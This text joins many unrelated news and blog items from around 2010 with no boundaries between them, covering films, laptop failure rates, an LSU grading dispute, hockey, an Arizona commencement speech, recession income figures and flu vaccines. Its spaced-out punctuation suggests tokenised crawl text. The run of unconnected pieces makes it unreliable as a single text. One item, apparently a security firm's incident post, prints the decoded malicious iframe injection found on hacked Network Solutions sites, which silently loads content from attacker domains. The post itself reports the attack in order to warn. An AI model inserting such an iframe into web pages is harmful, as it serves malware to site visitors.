In Jennifer Lopez ’s frothy comedy The Back - Up Plan ( which opens Friday ) , she ’s pregnant by artificial insemination and will inevitably deliver that baby by movie ’s end .
And if there ’s anything we ’ve learned from sweeps sitcom episodes and movies like Nine Months and Knocked Up , it ’s that childbirth can be a scary process , what with all the panicky dads passing out and the screaming of “ GET ME THE DRUGS ! ”
And so , after carefully consulting some of pop culture ’s most famous births , we ’ve compiled a helpful video slideshow for J. Lo called “ What to Expect When You ’re Expecting in a Comedy . ”
And thanks to The Cosby Show and Junior , this tutorial can work for women and men !
( Pregnant women in hospital dramas should look elsewhere for tips : having your breach baby delivered by an intern during a snowstorm will not be covered here . )
Resurrection Researchers Recreate Woolly Mammoth Protein in Living Cell
The first sequencing of a complex protein from an extinct species
There 's nothing worse than buying new gear that malfunctions shortly after you purchase it .
If you 're in the market for a new laptop , check out warranty - provider SquareTrade 's detailed laptop - reliability report to find the most dependable hardware .
Advertisement
The warranty company released a research paper late last year analyzing failure rates for over 30,000 laptops covered by their warranties .
The report is full of good information worth considering before your next big purchase .
The highlights of the study :
Looking at the first 3 years of ownership , 31 % of laptop owners reported a failure to SquareTrade .
Two - thirds of this failure ( 20.4 % ) came from hardware malfunctions , and one - third ( 10.6 % ) was reported as accidental damage .
Netbooks are projected to have a 20 % higher failure rate from hardware malfunctions than more expensive laptop computers .
ASUS and Toshiba were the most reliable manufacturers , with fewer than 16 % having a hardware malfunction over 3 years .
Advertisement
It 's interesting to note that , on a whole , netbooks are a lot more failure prone than laptops .
It 's also perhaps a little surprising that a company like Apple , known for its hardware , still ends up a percentage point or two worse off than companies like ASUS and Toshiba when it comes to laptop malfunction rates .
Got a laptop brand you trust above all others for its reliability ?
Sing its praises in the comments .
Thanks leonardtj !
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
Laptop Reliability Report [ SquareTrade via CNET ]
If you 're a professional writer yourself or just a college student training to be one , you can translate your love of the craft into a night of entertainment with these great movies based on writers .
You 'll find intriguing real life stories , movies that show the sometimes frustrating nature of writing , and a great collection of movies about the trials and tribulations of fictional writers themselves .
About Writing
These films deal with both the good and the bad that comes with writing .
My Brilliant Career : Through this film , you 'll see the writer Sybylla battling between her own desire for independence and society 's expectations for her future .
The Front :
This film will take you back to the McCarthy Era when writers were blacklisted for their real or imagined connections with the communist party .
In it , Woody Allen plays a man who agrees to be the front for a group of writers still trying to work .
Adaptation :
This film explores two difficulties of writing –having too much creative freedom and working on a project without much passion –with an insight and vulnerability that make it one of the best on - screen depictions of writing out there .
Wonder Boys :
This film focuses on professor and writer Grady Tripp who can't seem to get past his writer 's block to make anything of note , and progresses as his life , career and writing spin wildly out of control .
Barton Fink : John Turturro gives an amazing performance as the screenwriter Barton Fink , who faces writer 's block as he attempts to write the script for a wrestling picture and descends into a world of chaos as he begins connecting with the other residents of the hotel .
Sunset Boulevard :
In this noir film , a struggling screenwriter agrees to write a comeback script for an actress in the twilight of her career .
When he falls for another screenwriter , jealousy , wrath and even murder come into play .
Misery :
This film strikes fear into the heart of every serial novelist out there , with Kathy Bates playing a crazed fan unhappy that her favorite writer has decided to kill off her beloved character .
In a Lonely Place :
Get a noir vibe in this film about the trials and defeats that sometimes come along with being a writer , with Humphrey Bogart 's down - on - his - luck Dixon Steele as the leading man .
Shakespeare
In Love :
This film won an Oscar for best picture for its sad depiction of writing success in the face of lost love and sacrifice .
Sideways :
While wine is the main focus of this film , one of its main characters is a man frustrated and unable to get his seemingly very good novel published –something many writers can relate to .
Finding Forrester :
This film explores the sometimes tumultuous relationship that develops between a teen writing prodigy and a reclusive author played by Sean Connery .
I Capture the Castle :
In this movie you 'll find not only love , desperation and the decay of a once great family , but also the frustration that comes with not being able to match the success garnered by a first novel .
Writers Being Bad
A movie would n't be half as interesting if the story did n't have a little drama , and these films have it in spades , with writer characters often behaving very badly .
The Shining : This film combines the talents of Stanley Kubrick and Stephen King to bring to life the madness and personal creative hell of writer Jack Torrance .
The Squid and the Whale : With writing being such a competitive field , it 's natural that writers would feel jealous , even a little , about other writers ' success .
This film documents a family in crisis , where these sometimes petty jealousies take place between a husband and soon - to - be ex-wife .
Through a Glass Darkly :
This Ingmar Bergman classic documents 24 hours in the life of a family taking a holiday on the island .
The daughter has recently returned from spending time in a mental institution , and her estranged father sees inspiration for a novel in her condition , though perhaps not to the benefit of her health .
Deconstructing Harry : Check out this Woody Allen classic to see a depiction of a novelist who 's hopelessly self - centered and childish , hurting those around him as he finds himself with writer 's block .
Based on Real Writers
Check out these movies to learn about the lives behind some great works of literature .
Ten - foot - tall aliens ready to be ridden , massive alien statues , and sabretooth - like skulls litter the sets of Disney 's John Carter of Mars movie .
Check out the latest set pics and updates from the land of Barsoom .
Advertisement
Right now Andrew Stanton 's John Carter is filming Lake Powell , Utah .
And set pics and related images are starting to pour in .
To hear locals tell it , Disney has all but taken over their town , setting up different prop shops and FX sets in various buildings .
Sounds like the entire town is being transported , much like John Carter , to Mars .
Orlandi Statuary was contracted to mold a collection of sabertooth similar skulls and bones which were to be scattered about the desert during a fight scene .
The company made hundreds of them , and everyone is speculating that these are most likely Banth bones , from the orange creature illustrated above by Michael Whelan .
The picture shows it with Thuvia , maid of Mars , who was known for her mind - control over these creatures , which she kept as pets .
Advertisement
Next are a collection of set pics from John Carter Movie , which has plenty more insight and images for you to look at .
Here 's what we learned from their Utah sleuthing .
The first image is of a prop raft that floats , presumably for a water scene - our money is on a Mars canal moment , there are many on this planet .
The second picture has a small model of the temple to the Therns on the right hand side of the picture , in front of the arena .
And here 's the arena itself which John Carter Movie
There are 20 - foot - high statues of the Tharks - they 're not green , but Mars rock red , although they do have four arms .
Sadly , there are no pictures of these creations just yet .
JCM
A set source spotted a 4 - wheeler with " a saddle mounted about 10 ft in air [ and ] they must be going to cg some animal under it . "
The news just keeps getting better .
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
Here are a few pics from set :
Finally one last bit of news from JCM - if you 're worried about the costumes not being skimpy enough , fret no more .
A local casting call asked for " good - looking , dark - haired , tan people ages 18 - 35 yrs old Male and Female . "
And the call requests that all extras turn in pictures that show off their figure - in fact they suggest the guys to just turn in shirtless pics altogether .
Bring on the Martian fur and leather bikini parties .
INSIDE HIGHER ED INSIDE HIGHER ED
For more breaking news , features and commentary from the world of higher education , visit : insidehighered.com .
Dominique G. Homberger wo n't apologize for setting high expectations for her students .
The biology professor at Louisiana State University at Baton Rouge gives brief quizzes at the beginning of every class , to assure attendance and to make sure students are doing the reading .
On her tests , she does n't use a curve , as she believes that students must achieve mastery of the subject matter , not just achieve more mastery than the worst students in the course .
For multiple choice questions , she gives 10 possible answers , not the expected 4 , as she does n't want students to get very far with guessing .
Students in introductory biology do n't need to worry about meeting her standards anymore .
LSU removed her from teaching , mid-semester , and raised the grades of students in the class .
In so doing , the university 's administration has set off a debate about grade inflation , due process and a professor 's right to set standards in her own course .
To Homberger and her supporters , the university 's action has violated principles of academic freedom and weakened the faculty .
ON THE WEB :
Who 's to blame when students fail ?
FROM INSIDE HIGHER ED : Grades on the rise " This is terrible .
It undercuts all of what we do , " said Brooks Ellwood , president of the LSU Chapter of the American Association of University Professors , and the Robey H. Clark Distinguished Professor of Geology .
" If you are a non-tenured professor at this university , you have to think very seriously about whether you are going to fail too many students for the administration to tolerate . "
Even for those who , like Homberger , are tenured , there is a risk of losing the ability to stick to your standards , he said , Teaching geology , he said , there are students who get upset when he talks about the actual age of the earth and about evolution .
" Now students can complain to a dean " and have him removed , Elwood said .
" I worry that my ability to teach in the classroom has been diminished . "
Kevin Carman , dean of the College of Basic Sciences , did not respond to requests for a phone interview Wednesday .
But he issued a statement through the university 's public relations office that said : " LSU takes academic freedom very seriously , but it takes the needs of its students seriously as well .
There was an issue with this particular class that we felt needed to be addressed .
" The class in question is an entry - level biology class for non-science majors , and , at mid-term , more than 90 % of the students in Dr. Homberger 's class were failing or had dropped the class .
The extreme nature of the grading raised a concern , and we felt it was important to take some action to ensure that our students receive a rigorous , but fair , education .
Professor Homberger is not being penalized in any way ; her salary has not been decreased nor has any aspect of her appointment been changed . "
In an interview , Homberger said that there were numerous flaws with Carman 's statement .
She said that it was true that most students failed the first of four exams in the course .
But she also said that she told the students that — despite her tough grading policies — she believes in giving credit to those who improve over the course of the semester .
At the point that she was removed , she said , some students in the course might not have been able to do much better than a D , but every student could have earned a passing grade .
Further , she said that her tough policy was already having an impact , and that the grades on her second test were much higher ( she was removed from teaching right after she gave that exam ) , and that quiz scores were up sharply .
Students got the message from her first test , and were working harder , she said .
" I believe in these students .
They are capable , " she said .
And given that LSU boasts of being the state flagship , she said , she should hold students to high standards .
Many of these students are in their first year , and are taking their first college - level science course , so there is an adjustment for them to make , Homberger said .
But that does n't mean professors should lower standards .
Homberger said she was told that some students had complained about her grades on the first test .
" We are listening to the students who make excuses , and this is unfair to the other students , " she said .
" I think it 's unfair to the students " to send a message that the way to deal with a difficult learning situation is " to complain " rather than to study harder .
Further , she said that she was never informed that administrators had any concerns about her course until she received a notification that she was no longer teaching it .
( She noted that the university 's learning management system allowed superiors to review the grades on her first test in the course . )
And while her dean authorized her removal from teaching the course , she said , he never once sat in on her course .
Further , she said that in more than 30 years of teaching at LSU , no dean had ever done so , although they would have been welcome .
" Why did n't they talk to me ? " she asked .
Homberger said that she has not had any serious grading disputes before , although it 's been about 15 years since she taught an introductory course .
She has been teaching senior - level and graduate courses , and this year , she asked her department 's leaders where they could use help , and accepted their suggestion that she take on the intro course .
In discussions with colleagues after she was removed from the course , Homberger said that no one has ever questioned whether any of the test questions were unfair or unfairly graded , but that she was told that she may include " too many facts " on her tests .
Ellwood , the campus AAUP chapter president , said that his group had verified that no one informed Homberger of concerns before removing her from the course , and that no one had questioned the integrity of her tests .
He also said that the scores on the second test were notably better than the first one , suggesting that students were responding to the need to do more work .
" She 's very rigorous .
There 's no doubt about that , " he said .
Based on its investigation , the AAUP chapter has sent a letter to administrators , arguing that they violated Homberger 's academic freedom and due process rights and demanding an apology .
( No apology has been forthcoming . )
Cary Nelson , national president of the AAUP , said that the organization has always believed that " an instructor has the responsibility for assigning grades , " and that the LSU case was " disturbing in several respects . "
He noted that " the practice of assigning tough grades in an early assignment as a wake - up call to students is quite common " and that " the instructor made it clear that she had no intention of failing that many students when it came time for final grades . "
If administrators were concerned , he said , they had a responsibility to " discuss the matter fully with the instructor " before taking any action .
And he said that " removal from the classroom mid-semester is a serious sanction that requires all the protections of due process . "
Nelson said that the incident " raises serious questions about violations of pedagogical freedoms . "
Stuart Rojstaczer , a former Duke University professor who is the founder of GradeInflation.com , a website that publishes research on grading , questioned whether LSU was really trying to help students .
" How many times has Dean Carman removed a professor from a class who was giving more than 90 % As ? " he asked .
LSU 's public affairs office did not respond to follow - up questions about the statement it issued , and to the criticisms made by various faculty members .
Homberger declined to give out the names of students who have expressed support , saying that to do so would violate her confidentiality obligations .
But she released ( without student names ) answers to a bonus question on the course 's second test .
The question asked students to describe " the biggest ' AHA ' reaction " they had had during the course .
Many of the reactions were about various issues in biology — with evolution as a major topic .
But a number dealt with grades and work habits .
One was critical : " When I found out my test grade , I almost had a heart attack . "
But many other comments about the course standards were positive , with several students specifically praising Homberger 's advice that they form study groups .
One student wrote : " My biggest ' AHA ' reaction in this course is that I need to study for this course every night to make a good grade .
I must also attend class , take good notes , and have study sessions with others .
Usually a little studying can get me by but not with this class which is why it is my ' AHA ' reaction . "
Guidelines :
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
Read more
Chris Chelios is headed back to the show .
The 48 - year - old defenseman , a three - time Norris Trophy winner , has been called up by the Atlanta Thrashers , general manager Don Waddell told ESPN.com on Wednesday .
" Ca n't wait .
Got to make the most out of this chance , " Chelios said in a text message to ESPN.com .
Chelios had 22 points ( 5 goals , 17 assists ) in 46 games with the AHL's Chicago Wolves this season .
He signed an NHL deal with the Thrashers on March 2 .
The Wolves are Atlanta 's primary AHL affiliate .
" Chris has been an outstanding leader and mentor for our young players in Chicago and his level of play has made him deserving of this opportunity , " Waddell said .
" He 's a tremendous competitor who strengthens our group of defensemen and instantly adds a veteran presence to our locker room . "
The Chicago native , who has played in more games than any other American - born NHL player , last played in the NHL last May 27 with the Detroit Red Wings against the Chicago Blackhawks in the Western Conference finals .
Chelios was limited to 28 games with Detroit during the 2008 - 09 regular season because of a broken leg suffered during an exhibition game .
He played in six games during the playoffs .
He has 948 points in his career with Detroit , the Blackhawks and Montreal Canadiens .
He has appeared in an NHL - record 266 Stanley Cup playoff games and is a three - time captain for the U.S. Olympic team .
At 48 , Chelios is still three years younger than the oldest man to ever play in an NHL game .
Gordie Howe was 51 when he scored 15 goals for the Hartford Whalers in 1979 - 80 .
Pierre LeBrun covers the NHL for ESPN.com .
Information from The Associated Press was used in this report ..
0 SHARES Facebook Twitter
Network Solutions is getting hacked again .
Just today we were notified of more than 50 sites hacked with the following malware javascript :
If we decode this javascript , we see that it is injecting this iframe from http://corpadsinc.com/grep/ :
document .write ( s ) < iframe frameborder= " 0 " onload= ' if (! this.src ) { this.src= " http://corpadsinc.com/grep/ " ; this .height=0 ; this .
width=0;} '
Note that this time we are seeing all kind of sites hacked .
From WordPress , Joomla to just simple HTML sites .
UPDATE 1 : Google is already blacklisting lots of them …
Bad day to be a Network Solutions customer .
UPDATE 2 : Some sites are also compromised with this encoded javascript :
Which injects an iframe from that http://mainnetsoll.com/grep/ domain ( same from the attack of last week )
iframe frameborder= ” 0 ″ onload= ’ if (! this.src ) { this.src= ” http://mainnetsoll.com/grep/”; this .height=0 ; this .
width=0;} ‘
UPDATE 3 : Some WordPress sites we were analyzing only had the malware inserted at the cache file from WP - Super - Cache .
Everything else was clean .
UPDATE 4 : Post from http://stopmalvertising.com explaining their finds on this issue .
UPDATE 5 : Network solutions updated their blog apologizing to their clients and saying that they are working hard to fix it .
Hopefully it will be solved soon .
As always , if you need help to recover from this attack or need someone to monitor your web site for these issues , visit http://sucuri.net or just send us an email at contact@sucuri.net .
Professor Sandra Soto , welcome to civil rights notoriety .
Last week , Arizona University ’s professor of Latina studies took the stage to address 2010 graduates of the school ’s Social and Behavioral Sciences program .
Naturally , her words were timely and touched upon the state ’s recently passed immigration laws that allow police to question and detain anyone who they suspect of being an illegal immigrant .
ADVERTISEMENT
Then , she called the measure “ the strictest anti-immigrant legislation in the country ” that is “ explicitly intended to drive undocumented immigrants out of the state . ”
Her summary , while quite accurate , elicited a wave of boos and insults from the audience .
In a video of her speech published to YouTube , either the camera man or someone close by seems amused at her characterization .
“ That ’s right ! ” he said .
“ This is ‘ merica , ” leaving out the ‘ A ’ .
“ Cut your hair ! ”
“ …to a whole lot of people , myself included , it appears to not only invite but require the police to engage in racial profiling , ” she continued , eliciting another wave of boos . ”
ADVERTISEMENT
“ Bitch ! ” a man near the camera shouted .
“ Before we had a chance to fully get our heads around the implications of either 1070 or of the subsequent boycott , our governor signed HB 2281 , which is intended to eliminate any Ethnic Studies classes from public and charter schools in Arizona , ” Soto said .
“ Most people said it was inappropriate for Professor Soto to use the event as a ‘ political soap box ’ further highlighting the success of the conservative right in advancing the idea that Universities and institutions of higher education should be depoliticized places where one goes to learn objective truths , ” commented GLBT Latina blogger Marisol Lebron .
“ Meanwhile , if you ask me , it ’s pretty inappropriate for an audience for presumably educated adults to boo a woman of letters . ”
ADVERTISEMENT
Inside Higher Ed , an education journal , spoke to Soto after her speech to get her reactions and follow up on the public ’s response .
“ Since the talk , Soto said she has received a barrage of e-mail messages , many of them hateful and some of them potentially threatening , ” they reported .
“ Many such messages have also been posted on YouTube and on local Web sites that covered the speech .
ADVERTISEMENT
“ Soto said that she had no regrets about speaking out ‘ My work is in Chicana cultural studies , so it ’s my obligation , if I am going to be up on a stage , I feel it is my absolute responsibility to address these issues . ' ”
Watch a portion of the speech …
The full text of Professor Soto ’s speech follows .
ADVERTISEMENT
####
It is my great pleasure and honor to be among the first to congratulate you on completing your studies at the University of Arizona , the flagship institution of our state , and — I can say with utmost confidence — the university with the most Facebook fans in the state .
Congratulations as well to those family members and friends who have supported and encouraged our students through the process .
Graduates , I applaud you for showing up day after day , semester after semester , for opening your hearts and minds to multiple ways of seeing , representing , and analyzing the world .
For some of you , a Bachelor ’s degree has turned out to be not enough schooling and so you are headed off to graduate school , medical school and law school .
A handful of you are here today because you have finally reached the terrific milestone of completing a doctorate .
But most of you are here to celebrate the momentous conclusion of your undergraduate studies .
If you entered college immediately after finishing high school , you have been a student for at least the last 17 consecutive years .
17 years .
Now you will try your hand at making a life outside of the context of classes , teachers , required reading , libraries , flip - flops , office hours , deadlines , and all - nighters .
That you are about to undergo a major and exciting life transition may not have fully sunk in yet .
I ’m guessing that you have been too busy attending to the details and whirlwind of the end of your last semester : your examinations and essay writing , your celebrating and packing .
But in the upcoming months you are likely to experience a range of emotions from euphoria over what you might perceive as newfound freedom to a great sense of loss as you realize that college life simply cannot be replicated .
When finding yourself nostalgic for this stage of your life , can you remember that though you are no longer a student , you are taking your college experiences with you everywhere you go .
Whichever route you take from here , it is absolutely essential that you honor and not take for granted your diplomas .
Too many people in this country will never in their lifetime have the “ privilege ” to set foot on a research - one campus , much less hang a framed diploma on their wall .
You may not have always appreciated those five - page essay assignments in which you were required to analyze and interpret a social problem or a poem or a political speech .
But I hope that among the dozen or so of those essays you wrote for us , the process of brainstorming , outlining , discussing , writing , and revising at least one or two essays made you feel alive , interested , engaged , heard , smart , maybe even brilliant .
Now that you wo n’t be receiving grades and regular feedback from professors , it is crucial that you own your knowledge , that you deeply believe in yourselves as thinkers , and that you continue to hone your critical skills by being avid and sharp readers , by discussing social issues with your friends , co-workers , and family .
The United Negro College Fund created a spot - on slogan when 40 years ago they said simply “ A Mind is a Terrible Thing to Waste . ”
ADVERTISEMENT
Take your powers of reasoning , evaluating , analyzing , arguing , critiquing everywhere :
from the grocery store to the voting booth ; from the next episode of reality TV you watch to the controversial state bills you read ; from the way you handle a painful situation in which you suspect you are being treated unfairly , to the way you respond to a situation in which you bear witness to someone else ( possibly even a stranger ) being treated unfairly … whether because of the color of her skin , the accent he might have , or her country of origin .
One of my favorite classroom experiences is when a student raises her hand to say , “ Professor Soto , this discussion reminds me of a book we are reading in one of my other classes . ”
In that unique moment , this student is not only fully invested in and driving knowledge production but she wants to share her insights with me and her fellow students , asking us to consider an issue or a problem through a fresh angle , one enabled by innovative and interdisciplinary thinking .
We are counting on you to continue to make and share those inventive connections between issues that might seem separate from one another .
In fact , we are dependent on you — the next generation of leaders , teachers , journalists , and lawyers — you will have to confront and solve such a difficult and challenging set of problems .
I know that it will sound cliche for a convocation speaker to state that this particular group of graduates — the class of fill - in - the - blank — is at a crossroads .
However , if the recent past has been any indication of what is to come , you — the CLASS of 2010 — will need to muster all of the tools of your education in order to negotiate and help solve a range of social problems and vexing issues that those who came before you have not managed to disentangle , from immigration reform to our ongoing war , through the economic recession .
We have only to turn on the TV to see one of the wealthiest and most technologically sophisticated corporations in the world unable to stop an oil leak threatening natural and human devastation .
Who would have thought that an environmental disaster of that magnitude would be competing for national headline space with … Arizona ?
ADVERTISEMENT
The whole nation is watching Arizona right now .
We went so quickly from a fairly typical state situation in which we were concentrating our efforts on how best to dig ourselves out of this economic hole we have been in for the last several years without compromising our public services and our public education to a crisis situation in which our public policy and social relations are incredibly strained , in which racial discord is being provoked not solved by the recent legislation that is horrifying so many of us in and outside of Arizona .
Certainly , we will not all agree on how best to reform immigration .
But it is our civic responsibility to have educated , well - informed , and non-hysterical debate ,
and to develop solutions that are fundamentally respectful of human and civil rights .
What we so desperately need — and yes this does put the class of 2010 at a particular crossroads — is for you to bring every critical thinking skill at your disposal , and then some more , to bring all of the substantive knowledge of history , diverse cultures and societies , ethics and politics — bring all of these to the table .
The new Arizona law generally known as SB 1070 is considered the strictest anti-immigrant legislation in the country and is explicitly intended to drive undocumented immigrants out of the state .
One reason it has instigated a boycott is because to a whole lot of people , myself included , it appears to not only invite but require the police to engage in racial profiling .
Before we had a chance to fully get our heads around the implications of either 1070 or of the subsequent boycott , our governor signed HB 2281 , which is intended to eliminate any Ethnic Studies classes from public and charter schools in Arizona .
As I held hands with Middle and High School students who formed a human chain around TUSD headquarters this past Wednesday to protest this law , the children tirelessly chanted :
“ Our education is under attack , what do we do ?
Fight Back . ”
ADVERTISEMENT
As a professor , someone who has committed her life to teaching , I was moved beyond words to see those children peacefully — in fact , beautifully — asking only for a chance to see themselves reflected in the lessons they are taught , the lectures that they hear , the textbooks that they read .
I was there with those children for two reasons :
First , Chicano studies , the field under attack in this legislation , is my own field of research and teaching .
The law suggests that it is knowledge about marginalized histories and cultures that will divide us .
That is , this law tries to shoot the messenger .
As the young students told reporters repeatedly Wednesday , they have a right to learn about all sorts of diverse histories and cultural expressions .
The second reason I stood with those children is because their education , like your education , matters to me .
If I have been saying anything to you so far , it is that education has a public value .
That is , your education will not only bring you a bigger paycheck .
It will enable you to be a better fellow citizen , more productive , better able to participate in solving the challenges I and my peers have not been able to conquer .
So the ongoing cutbacks in public funding of education , as well as the recent devastating cuts to our own university among others , are deeply worrying to me in that they strike at both the quantity and quality of education that this state provides to its people .
I do hope that you will , like the youth I stood with on Wednesday , fight for public education .
Now that you have completed your own education , please remember to leave the door open behind you so that other students may enter .
On behalf of the faculty of the School of Social and Behavioral Sciences , and of the Department of Gender and Women ’s Studies , I wish you the very best .
Awesome .
I remember when I first discovered the original GTA when I was at sleep - a - way camp .
All I wanted to do was spend the day in the computer lab , yeah I was that kid .
The so - called “ Great Recession ” has left Americans depending on the government dole like never before .
Without record levels of welfare , unemployment and other government benefits as well as tax cuts last year , the income of U.S. households would have plunged by an astonishing $ 723 billion — more than four times the record $ 167 billion drop reported last month by the Commerce Department .
Moreover , for the first time since the Great Depression , Americans took more aid from the government than they paid in taxes .
The figures show the devastating results of the massive job losses last year and indicate that the economic recovery that began last summer is tenuous and has a long way to go before many Americans resume life as normal , analysts said .
Economic growth typically depends on consumer spending , which is fed by wages , rents , interest and other forms of income .
But the tentative revival of consumer spending in the second half of last year appears to have been fed largely by an extraordinary flood of government spending , as growth in other kinds of income has disappeared .
“ Governmental support was critical in keeping the economy , particularly consumer spending , from completely collapsing during the crisis , ” said Harm Bandholz , an economist at Unicredit Markets .
He said he is concerned that so much of the economic rebound is a result of government spending rather than a revival of private income and jobs .
That situation is unsustainable , he said , because the government has had to borrow massively to prop up the economy and cannot continue that binge for long .
TWT RELATED STORIES :
• No finish in sight for ‘ virtual ’ border fence
• ‘ Bipartisanship ’ in Congress : Good or bad ?
• Obama addresses school - dropout crisis
• Breaking ranks on gays in military
• Chinese spy buy caught on surveillance video
• Arkansas lt. governor to challenge Lincoln
While wages and other job - related income fell by a record $ 206 billion last year to $ 7.84 trillion , transfer payments from the government such as unemployment checks and Social Security burgeoned by $ 231 billion to $ 2.1 trillion .
Meanwhile , the amount of taxes that individual Americans paid plummeted by $ 325 billion to $ 2.1 trillion as a result of middle - class tax cuts and because nearly 6 million people were thrown out of work and are no longer paying payroll taxes .
Commerce economists said last year ’s unprecedented drop of $ 256 billion in private wages — the mainstay of consumers in ordinary times — was particularly dramatic , and was more than 40 times larger than the drop in wages during the entire 2001 recession .
Equally dramatic , a measure of income that closely tracks the ravages of the recession also plummeted by an unprecedented $ 384 billion .
That measure excludes transfer payments and adjusts for inflation .
It has stabilized at $ 9.1 trillion since the middle of last year , in a sign that the worst of the job and income losses are over .
While most of the government benefits — including Social Security , welfare , Medicaid , food stamps and regular unemployment benefits — are sent automatically to those who qualify , Congress is debating an extension of some benefits enacted as part of the stimulus package last year .
Those include jobless benefits and health insurance subsidies for the unemployed .
The Senate on Friday failed to pass an extension of jobless benefits for up to 99 weeks for workers in states with high unemployment rates .
Long - term jobless benefits expired Sunday , leaving many Americans dependent on those payments in limbo .
With more than 8 million workers laid off during the recession , unemployment benefits have quadrupled from $ 34 billion in January 2008 to $ 124 billion at the end of last year .
“ Millions of Americans are now relying on unemployment benefits as their only source of income other than food stamps , ” said Ross Eisenbrey , vice president of the Economic Policy Institute .
“ They are unable to find work because there are more than six job seekers for every opening .
There is literally nothing that most of these workers can do to get a job today .
Unemployment benefits are often the only way they can make ends meet for their families and keep a roof over their heads . ”
The proposed extension in long - term jobless aid was held up Friday by Sen. Jim Bunning , Kentucky Republican , who objected that it added $ 10 billion to the budget deficit .
As a result of record U.S. government borrowing , total debt in the United States has soared to an all - time high of 370 percent of yearly economic output , far exceeding its peak of 300 percent during the Great Depression .
“ If we cant find $ 10 billion somewhere for a bill that everybody in this body supports , we will never pay for anything , ” Mr. Bunning said .
Democrats vowed to renew the unemployment aid this week to minimize disruption for more than 1 million jobless people who would begin to exhaust their extended benefits on Monday .
“ The simple fact of the matter is that this is an emergency situation and should be treated as such , ” said Senate Majority Whip Richard J. Durbin , Illinois Democrat .
“ The most vulnerable families in America are going to suffer because of this political decision by one senator . …
We will be back , we will try to get this done .
And to those families : Hang in there . ”
The massive shift into dependence on the government , while essential in promoting an economic revival last year , has postponed a reckoning for many consumers who went too far into debt to maintain their lifestyles during the boom years , Mr. Bandholz said .
While the government was lavishing aid , banks were cutting credit to consumers by a record $ 250 billion , nearly as much as the amount consumers gained from government transfer payments .
“ This shift only postpones a solution to the problem ” by substituting government debt for consumer debt , Mr. Bandholz said .
“ These elevated debt loads will at least result in sluggish growth rates for the time being — and if the problem is not tackled with determination , it might very well lead to another crisis . ”
Some economists say the big shift toward dependence on government spending and borrowing is only temporary .
“ Sure , temporary government transfers played a role this past year .
But that ’s OK , ” said Bernard Baumohl , chief global economist at the Economic Outlook Group .
He noted that Americans also accumulated a record amount of savings last year as they stowed away funds out of fear of losing their jobs .
The increase in savings now enables many consumers to increase spending , while the 90 percent of workers who still have jobs can spend more because they are accumulating more income from overtime hours , he said .
“ It ’s a combination and interaction of all these forces — not just one — that will promote more future spending by households and keep the economy going later without government aid , ” he said .
Jobless benefits and other welfare spending for the unemployed will start to decline when job growth returns .
Many economists predict that employment will increase this spring or summer in the next stage of the recovery .
Because of bleak job prospects during the recession , some people were forced to go more permanently on the government dole .
In particular , many workers who were nearing retirement age and got laid off started drawing Social Security benefits .
The number of retirees taking Social Security at age 62 grew by a record 19 percent in the past year , helping to push up Social Security outlays by $ 100 billion .
Analysts expect those spending levels to stay high and continue to increase as more baby boomers retire .
Sign up for Daily Newsletters Manage Newsletters
Copyright © 2020 The Washington Times , LLC .
Click here for reprint permission .
[ image ]
If the main point of the nation 's influenza vaccination program is to reduce deaths from flu , then the program has failed , at least among people over 65 .
A growing body of research shows that because our immune systems age , flu vaccines do n't work as well in the elderly - the group of people most likely to die from flu - related causes .
The revelation has been so unsettling that public health officials have not shared the information widely with the public - even though some of the early findings have been a part of the scientific literature for several years now .
Michael Osterholm , who directs the University of Minnesota 's Center for Infectious Disease Research and Policy , Tuesday told a national conference on vaccine research that it 's time to be more open about the flu vaccine and its lack of protection for the elderly .
Osterholm also urged his colleagues to support attempts to create a new , effective vaccine .
Your support matters .
You make MPR News possible .
Individual donations are behind the clarity in coverage from our reporters across the state , stories that connect us , and conversations that provide perspectives .
Help ensure MPR remains a resource that brings Minnesotans together .
Donate today .
A gift of $ 17 makes a difference .
" These 36,000 deaths that we keep talking about with the flu , that we want to get people vaccinated for so they do n't happen , really is not going to occur .
And we have to be honest about that , " Osterholm said .
Part of the problem is that as our immune systems deteriorate with age , the same flu vaccination that causes our bodies to mount a strong immune response in our 20s , only elicits a weak reaction in our 60s and beyond .
That weaker response might be enough to offer a little protection from flu in a healthy , older person .
But the evidence suggests that it's not enough to actually prevent death among most of the frail , elderly people who die each year from flu - related causes .
Osterholm said he knows the idea that the flu vaccine does n't prevent deaths in the elderly sounds almost blasphemous and he admits he did n't really want to believe it at first either .
But he says the new research is incontrovertible , and that data must drive health policy .
" I know that some people are going to find it very challenging to basically understand that much of what we 've probably done has had little impact on deaths , " Osterholm said .
Osterholm said that previous studies showing that flu vaccines prevent half of all deaths in the elderly population were compromised by something called known as " selection bias , " meaning an error was made in selecting the people who were enrolled in the research , resulting in distorted and unreliable findings .
Lisa Jackson , a doctor at Group Health Center for Health Studies in Seattle , was one of the first researchers to challenge the idea that flu vaccines prevent half of all deaths in the elderly .
" Influenza only causes about five percent on average of deaths in seniors during winter months .
So even if the vaccine was perfect , you could prevent only five percent of deaths , " Jackson said .
" So if you 're showing a difference of 50 percent , there 's something else happening there . "
The first thing Jackson did was analyze the previous studies .
She wanted to see if vaccinated people had a lower rate of death during times of the year when flu viruses were not circulating .
She discovered that they did have a lower rate of death during those periods too .
" So that 's been sort of a shocking revelation , " Jackson said .
Her findings meant that there was probably another factor other than getting a flu shot that lowered the risk of death among vaccinated people .
Still , the findings did n't prove that flu vaccines have no effect .
To test that hypothesis , Jackson conducted another study looking specifically at pneumonia deaths .
Pneumonia is a common complication of severe influenza .
Jackson tried to eliminate the problems that previous researchers had with selection bias , by rejecting patients who had compromised immune systems .
She also reviewed patient records to make sure that her study subjects truly had pneumonia , and included people in her study that had been treated for pneumonia as outpatients , in addition to those treated in the hospital .
After adjusting for all of those factors , Jackson found there was no difference in the number of pneumonia deaths between people who got the vaccine and those who did n't .
" So I think we 've done the best that you can do and we did not see an effect , " Jackson said .
Jackson 's findings were not well received .
Two U.S. research journals rejected her pneumonia paper , before the British journal " The Lancet " finally agreed to publish her study .
In the years since , it has gotten a little easier to challenge the effectiveness of the flu vaccine as more research emerged that supports Jackson 's findings .
But the issue is still unsettled for some researchers .
